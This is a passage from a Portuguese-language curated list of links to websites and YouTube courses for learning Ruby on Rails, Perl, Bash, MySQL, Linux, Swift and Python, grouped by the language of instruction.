[Ruby On Rail Full Course 2022](https://www.youtube.com/playlist?list=PLAqsB9gf_hQY6pwlIbht35wSytqezS-Sy) - [Advanced Ruby on Rails](https://www.youtube.com/playlist?list=PLPiVX6hQQRl_UN9cLxSoGKQm_RF8pw7MU) - [Ruby On Rails 2021 | Complete Course](https://www.youtube.com/playlist?list=PLeMlKtTL9SH_J-S0JA9o5gUmcW-NZSDtF) ## 🐪 Sites e cursos para aprender Perl > Cursos para aprender Perl em Português - [Curso Perl - Alder Pinto](https://www.youtube.com/playlist?list=PLE1HNzXaOep0RJIQoWA9_-OPg4WUbjQUZ) - [Curso de Perl - Perfil Antigo](https://www.youtube.com/playlist?list=PLBDxU1-FpoohxqH3XfnqTqLCxTj8dz5sI) > Cursos para aprender Perl em Espanhol - [Tutorial de Perl en Español](https://www.youtube.com/playlist?list=PLjARR1053fYmN9oYz-H6ZI1fOkrjLz6L2) - [Curso de Perl en Español](https://www.youtube.com/playlist?list=PL8qgaJWZ7bGJPlIvAFbq8fKrFogUEJ3AJ) - [Curso Perl - David Elí Tupac](https://www.youtube.com/playlist?list=PL2FOMZ1Ba3plgMbgLlxE-8IXi7oIlkdVp) > Cursos para aprender Perl em Inglês - [Perl Online Training](https://www.youtube.com/playlist?list=PLWPirh4EWFpE0UEJPQ2PUeXUfvJDhPqSD) - [Perl Enough to be dangerous](https://www.youtube.com/watch?v=c0k9ieKky7Q&ab_channel=NedDev) - [Perl Tutorials](https://www.youtube.com/playlist?list=PL_RGaFnxSHWpqRBcStwV0NwMA3nXMh5GC) - [Perl Tutorial: Basics to Advanced](https://www.youtube.com/playlist?list=PL1h5a0eaDD3rTG1U7w9wmff6ZAKDN3b16) - [Perl Programming](https://www.youtube.com/playlist?list=PL5eJgcQ87sgcXxN8EG7RUGZ_kTDUDwYX9) - [Perl Scripting Tutorial Videos](https://www.youtube.com/playlist?list=PL9ooVrP1hQOH9R0GR6yFteE4XWbsYNLga) ## 🐷 Sites e cursos para aprender Bash > Cursos para aprender Bash em Português - [Curso Básico de Bash](https://www.youtube.com/playlist?list=PLXoSGejyuQGpf4X-NdGjvSlEFZhn2f2H7) - [Curso intensivo de programação em Bash](https://www.youtube.com/playlist?list=PLXoSGejyuQGr53w4IzUzbPCqR4HPOHjAI) - [Curso de Shell Scripting - Programação no Linux](https://www.youtube.com/playlist?list=PLucm8g_ezqNrYgjXC8_CgbvHbvI7dDfhs) > Cursos para aprender Bash em Espanhol - [Curso Profesional de Scripting Bash Shell](https://www.youtube.com/playlist?list=PLDbrnXa6SAzUsIAqsjVOeyagmmAvmwsG2) - [Curso Linux: Comandos Básicos [Introducción al Shell BASH]](https://www.youtube.com/playlist?list=PLN9u6FzF6DLTRhmLLT-ILqEtDQvVf-ChM) > Cursos para aprender Bash em Inglês - [Bash Scripting Full Course 3 Hours](https://www.youtube.com/watch?v=e7BufAVwDiM&ab_channel=linuxhint) - [Linux Command Line Full course: Beginners to Experts. Bash Command Line Tutorials](https://www.youtube.com/watch?v=2PGnYjbYuUo&ab_channel=Geek%27sLesson) - [Bash in 100 Seconds](https://www.youtube.com/watch?v=I4EWvMFj37g&ab_channel=Fireship) - [Bash Script with Practical Examples | Full Course](https://www.youtube.com/watch?v=TPRSJbtfK4M&ab_channel=Amigoscode) - [Beginner's Guide to the Bash Terminal](https://www.youtube.com/watch?v=oxuRxtrO2Ag&ab_channel=JoeCollins) - [212 Bash Scripting Examples](https://www.youtube.com/watch?v=q2z-MRoNbgM&ab_channel=linuxhint) - [Linux Bash for beginners 2022](https://www.youtube.com/watch?v=qALScO3E61I&ab_channel=GPS) - [Bash scripting tutorial for beginners](https://www.youtube.com/watch?v=9T2nEXlLy9o&ab_channel=FortifySolutions) - [Linux CLI Crash Course - Fundamentals of Bash Shell](https://www.youtube.com/watch?v=S99sQLravYo&ab_channel=codedamn) - [Shell Scripting](https://www.youtube.com/playlist?list=PLBf0hzazHTGMJzHon4YXGscxUvsFpxrZT) - [Shell Scripting Tutorial for Beginners](https://www.youtube.com/playlist?list=PLS1QulWo1RIYmaxcEqw5JhK3b-6rgdWO_) - [Bash Scripting | Complete Course](https://www.youtube.com/playlist?list=PLgmzaUQcOhaqQjXaqz7Ky5a_xj_8OlCK4) - [Complete Shell Scripting Tutorials](https://www.youtube.com/playlist?list=PL2qzCKTbjutJRM7K_hhNyvf8sfGCLklXw) - [Bash Scripting 3hrs course](https://www.youtube.com/playlist?list=PL2JwSAqE1httILs055eEgbnO9oTu1otIG) - [Bash Zero to Hero Series](https://www.youtube.com/playlist?list=PLP8aFdeDk9g5Pg7WHYfv6EsD1D8hrx5AJ) ## 🐴 Sites e cursos para aprender MySQL > Sites para aprender MySQL - [SQLZOO](https://sqlzoo.net/wiki/SQL_Tutorial) - [SQLBolt](https://sqlbolt.com/) - [LinuxJedi](https://linuxjedi.co.uk/tag/mysql/) - [SQLCourse](https://www.sqlcourse.com/) - [CodeQuizzes](https://www.codequizzes.com/apache-spark/spark/datasets-spark-sql) - [Planet MySQL](https://planet.mysql.com/pt/) - [MySQL Learn2torials](https://learn2torials.com/category/mysql) - [Learn MySQL, Memrise](https://app.memrise.com/course/700054/learn-mysql/) - [Tizag MySQL Tutorials](http://www.tizag.com/mysqlTutorial/) - [W3Schools SQL Tutorials](https://www.w3schools.com/sql/) - [SQL Basics Khan Academy](https://www.khanacademy.org/computing/computer-programming/sql) - [Phptpoint MySQL Tutorial](https://www.phptpoint.com/mysql-tutorial/) - [RoseIndia MySQL Tutorials](https://www.roseindia.net/mysql/) - [MySQL on Linux Like Geeks](https://likegeeks.com/mysql-on-linux-beginners-tutorial/) - [Mastering MySQL by Mark Leith](http://www.markleith.co.uk/) - [Tutorials Point MySQL Tutorial](https://www.tutorialspoint.com/mysql/index.htm) - [KillerPHP MySQL Video Tutorials](https://www.killerphp.com/mysql/videos/) - [PYnative MySQL Database Tutorial](https://pynative.com/python/databases/) - [Digital Ocean Basic MySQL Tutorial](https://www.digitalocean.com/community/tags/mysql) - [Journal to SQL Authority, Pinal Dave](https://blog.sqlauthority.com/) - [MySQL Tutorial, Learn MySQL Fast, Easy and Fun](https://www.mysqltutorial.org/) > Cursos para aprender MySQL em Português - [Curso de Banco de Dados MySQL](https://www.youtube.com/playlist?list=PLHz_AreHm4dkBs-795Dsgvau_ekxg8g1r) - [Curso de MySQL - Bóson Treinamentos](https://www.youtube.com/playlist?list=PLucm8g_ezqNrWAQH2B_0AnrFY5dJcgOLR) - [Curso SQL Completo 2022 em 4 horas - Dev Aprender](https://www.youtube.com/watch?v=G7bMwefn8RQ&ab_channel=DevAprender) - [Curso de SQL com MySQL (Completo) - Ótavio Miranda](https://www.youtube.com/playlist?list=PLbIBj8vQhvm2WT-pjGS5x7zUzmh4VgvRk) - [MySQL - Curso Completo para Iniciantes e Estudantes](https://www.youtube.com/playlist?list=PLOPt_yd2VLWGEnSzO-Sc9MYjs7GZadX1f) - [Curso de MySQL - Daves Tecnologia](https://www.youtube.com/playlist?list=PL5EmR7zuTn_ZGtE7A5PJjzQ0u7gicicLK) - [Curso de SQL - CFBCursos](https://www.youtube.com/playlist?list=PLx4x_zx8csUgQUjExcssR3utb3JIX6Kra) - [Curso Gratuito MySQL Server](https://www.youtube.com/playlist?list=PLiLrXujC4CW1HSOb8i7j8qXIJmSqX44KH) - [Curso de MySQL - Diego Moisset](https://www.youtube.com/playlist?list=PLIygiKpYTC_4KmkW7AKH87nDWtb29jHvN) - [Curso completo MySQL WorkBench](https://www.youtube.com/playlist?list=PLq-sApY8QuyeEq4L_ECA7yYgOJH6IUphP) - [Curso de MySQL 2022 - IS](https://www.youtube.com/playlist?list=PL-6S8_azQ-MrCeQgZ1ZaD8Be3EVW4wEKx) - [MySql/MariaDB - Do básico ao avançado](https://www.youtube.com/playlist?list=PLfvOpw8k80WqyrR7P7fMNREW2Q82xJlpO) - [Curso de PHP com MySQL](https://www.youtube.com/playlist?list=PLucm8g_ezqNrkPSrXiYgGXXkK4x245cvV) > Cursos para aprender MySQL em Inglês - [The New Boston MySQL Videos](https://www.youtube.com/playlist?list=PL32BC9C878BA72085) - [MySQL For Beginners, Programming With Mosh](https://www.youtube.com/watch?v=7S_tz1z_5bA&ab_channel=ProgrammingwithMosh) - [Complete MySQL Beginner to Expert](https://www.youtube.com/watch?v=en6YPAgc6WM&ab_channel=FullCourse) - [Full MySQL Course for Beginners](https://www.youtube.com/playlist?list=PLyuRouwmQCjlXvBkTfGeDTq79r9_GoMt9) - [MySQL Complete Tutorial for Beginners 2022](https://www.youtube.com/playlist?list=PLjVLYmrlmjGeyCPgdHL2vWmEGKxcpsC0E) - [SQL for Beginners (MySQL)](https://www.youtube.com/playlist?list=PLUDwpEzHYYLvWEwDxZViN1shP-pGyZdtT) - [MySQL Course](https://www.youtube.com/playlist?list=PLBlpUqEneF0-xZ1ctyLVqhwJyoQsyfOsO) - [MySQL Tutorial For Beginners - Edureka](https://www.youtube.com/playlist?list=PL9ooVrP1hQOGECN1oA2iXcWFBTRYUxzQG) - [MySQL Tutorial for Beginners](https://www.youtube.com/playlist?list=PLS1QulWo1RIY4auvfxAHS9m_fZJ2wxSse) - [MySQL Tutorial for beginner - ProgrammingKnowledge](https://www.youtube.com/playlist?list=PLS1QulWo1RIahlYDqHWZb81qsKgEvPiHn) - [MySQL DBA Tutorial - Mughees Ahmed](https://www.youtube.com/playlist?list=PLd5sTGXltJ-l9PKT2Bynhg0Ou2uESOJiH) - [MySQL DBA Tutorial - TechBrothers](https://www.youtube.com/playlist?list=PLWf6TEjiiuICV0BARDhRC0JvNKHC5MDEU) - [SQL Tutorial - Full Database Course for Beginners](https://www.youtube.com/watch?v=HXV3zeQKqGY&ab_channel=freeCodeCamp.org) ## 🐧 Sites e cursos para aprender Linux > Sites para aprender Linux - [Tecmint](https://www.tecmint.com/) - [Linuxize](https://linuxize.com/) - [nixCraft](https://www.cyberciti.biz/) - [It's FOSS](https://itsfoss.com/) - [Linux Hint](https://linuxhint.com/) - [FOSS Linux](https://www.fosslinux.com/) - [LinuxOPsys](https://linuxopsys.com/) - [Linux Journey](https://linuxjourney.com/) - [Linux Command](https://linuxcommand.org/) - [Linux Academy](https://linuxacademy.org/) - [Linux Survival](https://linuxsurvival.com/) - [Linux Handbook](https://linuxhandbook.com/) - [Ryan's Tutorials](https://ryanstutorials.net/) - [LinuxFoundationX](https://www.edx.org/school/linuxfoundationx) - [LabEx Linux For Noobs](https://labex.io/courses/linux-for-noobs) - [Conquering the Command Line](http://conqueringthecommandline.com/) - [Guru99 Linux Tutorial Summary](https://www.guru99.com/unix-linux-tutorial.html) - [Eduonix Learn Linux From Scratch](https://www.eduonix.com/courses/system-programming/learn-linux-from-scratch) - [TLDP Advanced Bash Scripting Guide](https://tldp.org/LDP/abs/html/) - [The Debian Administrator's Handbook](https://debian-handbook.info/) - [Cyberciti Bash Shell Scripting Tutorial](https://bash.cyberciti.biz/guide/Main_Page) - [Digital Ocean Getting Started With Linux](https://www.digitalocean.com/community/tutorial_series/getting-started-with-linux) - [Learn Enough Command Line To Be Dangerous](https://www.learnenough.com/command-line-tutorial) > Cursos para aprender Linux em Português - [Curso de Linux - Primeiros Passos](https://www.youtube.com/playlist?list=PLHz_AreHm4dlIXleu20uwPWFOSswqLYbV) - [Curso de Linux Básico / Certificação LPIC - 1](https://www.youtube.com/playlist?list=PLucm8g_ezqNp92MmkF9p_cj4yhT-fCTl7) - [Curso de Linux - Matheus Battisti](https://www.youtube.com/playlist?list=PLnDvRpP8BnezDTtL8lm6C-UOJZn-xzALH) - [Curso GNU/Linux - Paulo Kretcheu](https://www.youtube.com/playlist?list=PLuf64C8sPVT9L452PqdyYCNslctvCMs_n) - [Curso completo de Linux desde cero para principiantes](https://www.youtube.com/playlist?list=PL2Z95CSZ1N4FKsZQKqCmbylDqssYFJX5A) - [Curso de Linux Avançado Terminal](https://www.youtube.com/playlist?list=PLGw1E40BSQnRZufbzjGVzkH-O8SngPymp) - [Curso Grátis Linux Ubuntu Desktop](https://www.youtube.com/playlist?list=PLozhsZB1lLUMHaZmvczDWugUv9ldzX37u) - [Curso Kali Linux - Daniel Donda](https://www.youtube.com/playlist?list=PLPIvFl3fAVRfzxwHMK1ACl9m4GmwFoxVz) - [Curso Grátis Linux Ubuntu Server 18.04.x LTS](https://www.youtube.com/playlist?list=PLozhsZB1lLUOjGzjGO4snI34V0zINevDm) - [Curso de Linux Ubuntu - Portal Hugo Cursos](https://www.youtube.com/playlist?list=PLxNM4ef1Bpxh3gfTUfr3BGmfuLUH4L-5Z) - [Cursos de Linux - Playlist variada com 148 vídeos](https://www.youtube.com/playlist?list=PLreu0VPCNEMQJBXmyptwC5gDGGGnQnu_u) - [Curso de Linux Básico para Principiantes 2021](https://www.youtube.com/playlist?list=PLG1hKOHdoXktPkbN_sxqr1fLqDle8wnOh) - [Revisão Certificação Linux Essentials](https://www.youtube.com/playlist?list=PLsBCFv4w3afsg8QJnMwQbFGumLpwFchc-) - [Curso completo de Linux do zero - ProfeSantiago](https://www.youtube.com/playlist?list=PLbcS-eIZbbxUqcd3Kr74fo46HzfnYpMqc) > Cursos para aprender Linux em Inglês - [The Linux Basics Course: Beginner to Sysadmin, Step by Step](https://www.youtube.com/playlist?list=PLtK75qxsQaMLZSo7KL-PmiRarU7hrpnwK) - [Linux for Hackers (and everyone)](https://www.youtube.com/playlist?list=PLIhvC56v63IJIujb5cyE13oLuyORZpdkL) - [Linux Command Line Tutorial For Beginners](https://www.youtube.com/playlist?list=PLS1QulWo1RIb9WVQGJ_vh-RQusbZgO_As) - [Linux Crash Course](https://www.youtube.com/playlist?list=PLT98CRl2KxKHKd_tH3ssq0HPrThx2hESW) - [The Complete Kali Linux Course: Beginner to Advanced](https://www.youtube.com/playlist?list=PLYmlEoSHldN7HJapyiQ8kFLUsk_a7EjCw) - [Linux Online Training](https://www.youtube.com/playlist?list=PLWPirh4EWFpGsim4cuJrh9w6-yfuC9XqI) - [CompTIA Linux+ XK0-004 Complete Video Course](https://www.youtube.com/playlist?list=PLC5eRS3MXpp-zlq64CcDfzMl2hO2Wtcl0) - [LPI Linux Essentials (010-160 Exam Prep)](https://www.youtube.com/playlist?list=PL78ppT-_wOmvlYSfyiLvkrsZTdQJ7A24L) - [Complete Linux course for beginners in Arabic](https://www.youtube.com/playlist?list=PLNSVnXX5qE8VOJ6BgMytvgFpEK2o4sM1o) - [Linux internals](https://www.youtube.com/playlist?list=PLX1h5Ah4_XcfL2NCX9Tw4Hm9RcHhC14vs) - [The Complete Red Hat Linux Course: Beginner to Advanced](https://www.youtube.com/playlist?list=PLYmlEoSHldN6W1w_0l-ta8oKzGWqCcq63) - [Linux for Programmers](https://www.youtube.com/playlist?list=PLzMcBGfZo4-nUIIMsz040W_X-03QH5c5h) - [Kali Linux: Ethical Hacking Getting Started Course](https://www.youtube.com/playlist?list=PLhfrWIlLOoKMe1Ue0IdeULQvEgCgQ3a1B) - [Linux Masterclass Course - A Complete Tutorial From Beginner To Advanced](https://www.youtube.com/playlist?list=PL2kSRH_DmWVZp_cu6MMPWkgYh7GZVFS6i) - [Unix/Linux Tutorial Videos](https://www.youtube.com/playlist?list=PLd3UqWTnYXOloH0vWBs4BtSbP84WcC2NY) - [Linux Administration Tutorial Videos](https://www.youtube.com/playlist?list=PL9ooVrP1hQOH3SvcgkC4Qv2cyCebvs0Ik) - [Linux Tutorials | GeeksforGeeks](https://www.youtube.com/playlist?list=PLqM7alHXFySFc4KtwEZTANgmyJm3NqS_L) - [Linux Operating System - Crash Course for Beginners](https://www.youtube.com/watch?v=ROjZy1WbCIA&ab_channel=freeCodeCamp.org) - [The Complete Linux Course: Beginner to Power User](https://www.youtube.com/watch?v=wBp0Rb-ZJak&ab_channel=JosephDelgadillo) - [The 50 Most Popular Linux & Terminal Commands - Full Course for Beginners](https://www.youtube.com/watch?v=ZtqBQ68cfJc&ab_channel=freeCodeCamp.org) - [Linux Server Course - System Configuration and Operation](https://www.youtube.com/watch?v=WMy3OzvBWc0&ab_channel=freeCodeCamp.org) - [Linux Tutorial for Beginners - Intellipaat](https://www.youtube.com/watch?v=4ZHvZge1Lsw&ab_channel=Intellipaat) ## 🦂 Sites e cursos para aprender Swift > Cursos para aprender Swift em Português - [Curso de Swift- Tiago Aguiar](https://www.youtube.com/playlist?list=PLJ0AcghBBWShgIH122uw7H9T9-NIaFpP-) - [Curso grátis Swift e SwiftUI (Stanford 2020)](https://www.youtube.com/playlist?list=PLMdYygf53DP46rneFgJ7Ab6fJPcMvr8gC) - [Curso de Swift - Desenvolvimento IOS Apple](https://www.youtube.com/playlist?list=PLxNM4ef1BpxjjMKpcYSqXI4eY4tZG2csm) - [Curso iOS e Swift](https://www.youtube.com/playlist?list=PLW-gR4IAiL9ubGKgE5MsyzwovmeOF7nt_) > Cursos para aprender Swift em Espanhol - [Curso de programación con Swift](https://www.youtube.com/playlist?list=PLNdFk2_brsRc57R6UaHy4zx_FHqx236G1) - [Curso programación iOS con Xcode y Swift](https://www.youtube.com/playlist?list=PLNdFk2_brsRcWM-31vJUgyHIGpopIDw4s) - [Curso Swift en Español desde cero [2022]](https://www.youtube.com/playlist?list=PLeTOFRUxkMcozbUpMiaHRy8_GjzJ_9tyi) - [Curso de Swift Español - Clonando YouTube](https://www.youtube.com/playlist?list=PLT_OObKZ3CpuEomHCc6v-49u3DFCdCyLH) - [Curso De Swift - Código Facilito](https://www.youtube.com/playlist?list=PLTPmvYfJJMVp_YzS22WI-5NYW1c_7eTBD) - [Curso de SwiftUI](https://www.youtube.com/playlist?list=PLNdFk2_brsRetB7LiUfpnIclBe_1iOS4M) - [Curso Xcode y Swift desde cero](https://www.youtube.com/playlist?list=PLNdFk2_brsRdyYGDX8QLFKmcpQPjFFrDC) - [Aprende Swift 3 desde cero](https://www.youtube.com/playlist?list=PLD2wfKpqmxnmnjA7lcbc2M2P6TfygmrL3) - [Curso de Swift 4 desde cero](https://www.youtube.com/playlist?list=PLD2wfKpqmxnn7-hEmKx7P3xDY8iYWsz59) - [Curso Introducción a Swift](https://www.youtube.com/playlist?list=PLvQAED-MnQpaJrSjVW449S8Kda3wGQqKD) > Cursos para aprender Swift em Inglês - [Swift Tutorial - Full Course for Beginners](https://www.youtube.com/watch?v=comQ1-x2a1Q&ab_channel=freeCodeCamp.org) - [Learn Swift Fast (2020) - Full Course For Beginners](https://www.youtube.com/watch?v=FcsY1YPBwzQ&ab_channel=CodeWithChris) - [2021 SwiftUI Tutorial for Beginners (3.5 hour Masterclass)](https://www.youtube.com/watch?v=F2ojC6TNwws&ab_channel=CodeWithChris) - [Swift Tutorial For Beginners [Full Course] Learn Swift For iOS Development](https://www.youtube.com/watch?v=mhE-Mp07RTo&ab_channel=Devslopes) - [Swift Programming Tutorial | FULL COURSE | Absolute Beginner](https://www.youtube.com/watch?v=CwA1VWP0Ldw&ab_channel=SeanAllen) - [Swift Programming Tutorial for Beginners (Full Tutorial)](https://www.youtube.com/watch?v=Ulp1Kimblg0&ab_channel=CodeWithChris) ## 🐍 Sites e cursos para aprender Python > Sites & E-books para aprender Python - [Think Python](https://greenteapress.com/wp/think-python/) - [Think Python 2e](https://greenteapress.com/wp/think-python-2e/) - [A Byte of Python](https://python.swaroopch.com/) - [Real Python](https://realpython.com/) - [Full Stack Python](https://www.fullstackpython.com/) - [FreeCodeCamp Python](https://www.freecodecamp.org/learn/scientific-computing-with-python/) - [Dive Into Python 3](https://diveintopython3.net/) - [Practice Python](https://www.practicepython.org/) - [The Python Guru](https://thepythonguru.com/) - [The Coder's Apprentice](https://www.spronck.net/pythonbook/) - [Python Principles](https://pythonprinciples.com/) - [Harvard's CS50 Python Video](https://pll.harvard.edu/course/cs50s-introduction-programming-python?delta=0) - [Cracking Codes With Python](https://inventwithpython.com/cracking/) - [Learn Python, Break Python](https://learnpythonbreakpython.com/) - [Google's Python Class](https://developers.google.com/edu/python) - [Python Like You Mean It](https://www.pythonlikeyoumeanit.com/) - [Beyond the Basic Stuff with Python](https://inventwithpython.com/beyond/) - [Automate the Boring Stuff with Python](https://automatetheboringstuff.com/) - [The Big Book of Small Python Projects](https://inventwithpython.com/bigbookpython/) - [Learn Python 3 From Scratch](https://www.educative.io/courses/learn-python-3-from-scratch) - [Python Tutorial For Beginners, Edureka](https://www.edureka.co/blog/python-tutorial/) - [Microsoft's Introduction to Python Course](https://learn.microsoft.com/en-us/training/modules/intro-to-python/) - [Beginner's Guide to Python, Official Wiki](https://wiki.python.org/moin/BeginnersGuide) - [Python for Everybody Specialization, Coursera](https://www.coursera.org/specializations/python) > Cursos para aprender Python em Português - [Curso completo de Python - Curso em vídeo](https://www.youtube.com/playlist?list=PLvE-ZAFRgX8hnECDn1v9HNTI71veL3oW0) - [Curso de Python - CFB Cursos](https://www.youtube.com/playlist?list=PLx4x_zx8csUhuVgWfy7keQQAy7t1J35TR) - [Curso Completo de Python - Jefferson Lobato](https://www.youtube.com/playlist?list=PLLVddSbilcul-1bAKtMKoL6wOCmDIPzFJ) - [Curso Python para Iniciantes - Didática Tech](https://www.youtube.com/playlist?list=PLyqOvdQmGdTSEPnO0DKgHlkXb8x3cyglD) - [Curso de Python - eXcript](https://www.youtube.com/playlist?list=PLesCEcYj003QxPQ4vTXkt22-E11aQvoVj) - [Curso de Python - Otávio Miranda](https://www.youtube.com/playlist?list=PLbIBj8vQhvm0ayQsrhEf-7-8JAj-MwmPr) - [Aulas Python - Ignorância Zero](https://www.youtube.com/playlist?list=PLfCKf0-awunOu2WyLe2pSD2fXUo795xRe) - [Curso de Programação em Python - Prime Cursos do Brasil](https://www.youtube.com/playlist?list=PLFKhhNd35zq_INvuX9YzXIbtpo_LGDzYK) - [Curso Python p/ Iniciantes - Refatorando](https://www.youtube.com/playlist?list=PLj7gJIFoP7jdirAFg-fHe9HKOnGLGXSHZ) - [Curso Python Básico - Solyd](https://www.youtube.com/playlist?list=PLp95aw034Wn_WtEmlepaDrw8FU8R5azcm) - [Curso de Python - Bóson Treinamentos](https://www.youtube.com/playlist?list=PLucm8g_ezqNrrtduPx7s4BM8phepMn9I2) - [O Melhor Curso de Python - Zurubabel](https://www.youtube.com/playlist?list=PL4OAe-tL47sY8SGhtkGoP0eQd4le3badz) - [Curso de Python - Hashtag Programação](https://www.youtube.com/playlist?list=PLpdAy0tYrnKyCZsE-ifaLV1xnkXBE9n7T) - [Curso de Python Essencial para Data Science](https://www.youtube.com/playlist?list=PL3ZslI15yo2qCEmnYOa2sq6VQOzQ2CFhj) - [Curso de Python do Zero ao Data Scientist](https://www.youtube.com/playlist?list=PLZlkyCIi8bMprZgBsFopRQMG_Kj1IA1WG) - [Curso de Python moderno + Análise de dados](https://www.youtube.com/playlist?list=PLLWTDkRZXQa9YyC1LMbuDTz3XVC4E9ZQA) - [Curso de Python 3 - Do básico ao avançado - RfZorzi](https://www.youtube.com/playlist?list=PLqx8fDb-FZDEDg-FOuwNKEpxA0LhzrdhZ) - [Curso de Python Intermediário / Avançado - HashLDash](https://www.youtube.com/playlist?list=PLsMpSZTgkF5ANrrp31dmQoG0-hPoI-NoX) - [Curso Python para Machine Learning e Análise de Dados](https://www.youtube.com/playlist?list=PLyqOvdQmGdTR46HUxDA6Ymv4DGsIjvTQ-) - [Curso de programación Python desde cero](https://www.youtube.com/playlist?list=PLyvsggKtwbLW1j0d5yaCkRF9Axpdlhsxz) - [Introdução à Ciência da Computação com Python](https://www.youtube.com/playlist?list=PLcoJJSvnDgcKpOi_UeneTNTIVOigRQwcn) - [Curso de Python - Módulo Tkinter](https://www.youtube.com/playlist?list=PLesCEcYj003ShHnUT83gQEH6KtG8uysUE) - [Curso Selenium com Python - Eduardo Mendes](https://www.youtube.com/playlist?list=PLOQgLBuj2-3LqnMYKZZgzeC7CKCPF375B) - [Python - Curso Básico - João Ribeiro](https://www.youtube.com/playlist?list=PLXik_5Br-zO-vShMozvWZWdfcgEO4uZR7) - [Curso de Python 3 - Caio Dellaqua](https://www.youtube.com/playlist?list=PLnHC9X5I2m1_BHFb8rS950nCZXpua3Dj3) - [Curso de introdução ao desenvolvimento Web com Python 3 e Django](https://www.youtube.com/playlist?list=PLjv17QYEBJPpd6nI-MXpIa4qR7prKfPQz) - [Curso Analista de dados Python / Numpy / Pandas](https://www.youtube.com/playlist?list=PL3Fmwz_E1hXRWxIkP843DiDf0ZeqgftTy) - [Curso de Python Avançado - Portal Hugo Cursos](https://www.youtube.com/playlist?list=PLxNM4ef1Bpxj-fFV_rwrLlPA6eMvZZAXu) - [Python Tkinter - João Ribeiro](https://www.youtube.com/playlist?list=PLXik_5Br-zO_m8NaaEix1pyQOsCZM7t1h) - [Curso PYQT5 - Python - Desenvolvendo um sistema do zero](https://www.youtube.com/playlist?list=PLwdRIQYrHHU1MGlXIykshfhEApzkPXgQH) - [Lógica de Programação com Python](https://www.youtube.com/playlist?list=PLt7yD2z4olT--vM2fOFTgsn2vOsxHE5LX) - [Curso de Programação Python com Blender](https://www.youtube.com/playlist?list=PL3rePi75166RvuavzR1YU6eo5Q0gvXdI7) - [Curso SQL com python](https://www.youtube.com/playlist?list=PLLWTDkRZXQa88Opt03kzilhx_NGEYSfFt) - [Curso de Python - Módulo SQLite - eXcript](https://www.youtube.com/playlist?list=PLesCEcYj003QiX5JaM24ytHrHiOJknwog) - [Curso Python desde 0](https://www.youtube.com/playlist?list=PLU8oAlHdN5BlvPxziopYZRd55pdqFwkeS) - [Lógica de Programação Usando Python - Curso Completo](https://www.youtube.com/playlist?list=PL51430F6C54953B73) - [Curso Python - Edson Leite Araújo](https://www.youtube.com/playlist?list=PLAwKJHUl9-WeOUxsFr9Gej3sqvS7brpMz) - [Curso Python para hacking - Gabriel Almeida](https://www.youtube.com/playlist?list=PLTt8p5xagieX0sOtwFG-je7y_PA-oTrnY) - [Curso de Python Orientado a Objetos](https://www.youtube.com/playlist?list=PLxNM4ef1Bpxhm8AfK1nDMWPDYXtmVQN-z) - [Curso de TDD em Python](https://www.youtube.com/playlist?list=PL4OAe-tL47sZrzX5jISTuNsGWaMqx8uuE) - [Curso de Python em Vídeo - Daves Tecnolgoia](https://www.youtube.com/playlist?list=PL5EmR7zuTn_Z-I4lLdZL9_wCZJzJJr2pC) - [Curso de Python Básico - Agricultura Digital](https://www.youtube.com/playlist?list=PLVmqNeV0L_zvTZC3uRvzMpySm4XzDVLHS) - [Exercícios de Python 3 - Curso em vídeo](https://www.youtube.com/playlist?list=PLHz_AreHm4dm6wYOIW20Nyg12TAjmMGT-) - [Curso Python- Ignorância Zero](https://www.youtube.com/playlist?list=PLX65ruEX8lOTS_IsLp-STkZLWV9glggDG) - [Curso Lógica de Programação Com Python - Hora de Programar](https://www.youtube.com/playlist?list=PL8hh5X1mSR2CMd6Y_SCXaNCru2bUoRlT_) > Cursos para aprender Python em Inglês - [Learn Python - Full Course for Beginners - freeCodeCamp](https://www.youtube.com/watch?v=rfscVS0vtbw&ab_channel=freeCodeCamp.org) - [Python Tutorial - Python Full Course for Beginners - Programming with Mosh](https://www.youtube.com/watch?v=_uQrJ0TkZlc&ab_channel=ProgrammingwithMosh) - [Python Tutorial: Full Course for Beginners - Bro Code](https://www.youtube.com/watch?v=XKHEtdqhLK8&t=1s&ab_channel=BroCode) - [Python Tutorial for Beginners - Full Course in 12 Hours](https://www.youtube.com/watch?v=B9nFMZIYQl0&ab_channel=CleverProgrammer) - [Python for Beginners – Full Course freeCodeCamp](https://www.youtube.com/watch?v=eWRfhZUzrAc&ab_channel=freeCodeCamp.org) - [Python for Everybody - Full University Python Course](https://www.youtube.com/watch?v=8DvywoWv6fI&ab_channel=freeCodeCamp.org) - [Python Full Course - Amigoscode](https://www.youtube.com/watch?v=LzYNWme1W6Q&ab_channel=Amigoscode) - [Python Tutorial for Beginners - Learn Python in 5 Hours](https://www.youtube.com/watch?v=t8pPdKYpowI&ab_channel=TechWorldwithNana) - [Intermediate Python Programming Course - freeCodeCamp](https://www.youtube.com/watch?v=HGOBQPFzWKo&ab_channel=freeCodeCamp.org) - [Automate with Python – Full Course for Beginners - freeCodeCamp](https://www.youtube.com/watch?v=PXMJ6FS7llk&ab_channel=freeCodeCamp.org) - [20 Beginner Python Projects](https://www.youtube.com/watch?v=pdy3nh1tn6I&ab_channel=freeCodeCamp.org) - [Data Structures and Algorithms in Python - Full Course for Beginners](https://www.youtube.com/watch?v=pkYVOmU3MgA&ab_channel=freeCodeCamp.org) - [Python for Beginners | Full Course - Telusko](https://www.youtube.com/watch?v=YfO28Ihehbk&ab_channel=Telusko) - [Python for Beginners (Full Course) | Programming Tutorial](https://www.youtube.com/playlist?list=PLsyeobzWxl7poL9JTVyndKe62ieoN-MZ3) - [Python for Beginners - Microsoft Developer](https://www.youtube.com/playlist?list=PLlrxD0HtieHhS8VzuMCfQD4uJ9yne1mE6) - [Python RIGHT NOW - NetworkChuck](https://www.youtube.com/playlist?list=PLIhvC56v63ILPDA2DQBv0IKzqsWTZxCkp) - [Learn Python | 8h Full Course | Learn Python the Simple, Intuitive and Intended Way](https://www.youtube.com/playlist?list=PLvMRWNpDTNwTNwsQmgTvvG2i1znjfMidt) - [Python Crash Course - Learning Python](https://www.youtube.com/playlist?list=PLiEts138s9P1A6rXyg4KZQiNBB_qTkq9V) - [Crash Course on Python for Beginners | Google IT Automation with Python Certificate](https://www.youtube.com/playlist?list=PLTZYG7bZ1u6pqki1CRuW4D4XwsBrRbUpg) - [CS50's Introduction to Programming with Python](https://cs50.harvard.edu/python/2022/) - [Complete Python tutorial in Hindi](https://www.youtube.com/playlist?list=PLwgFb6VsUj_lQTpQKDtLXKXElQychT_2j) - [Python Tutorials - Corey 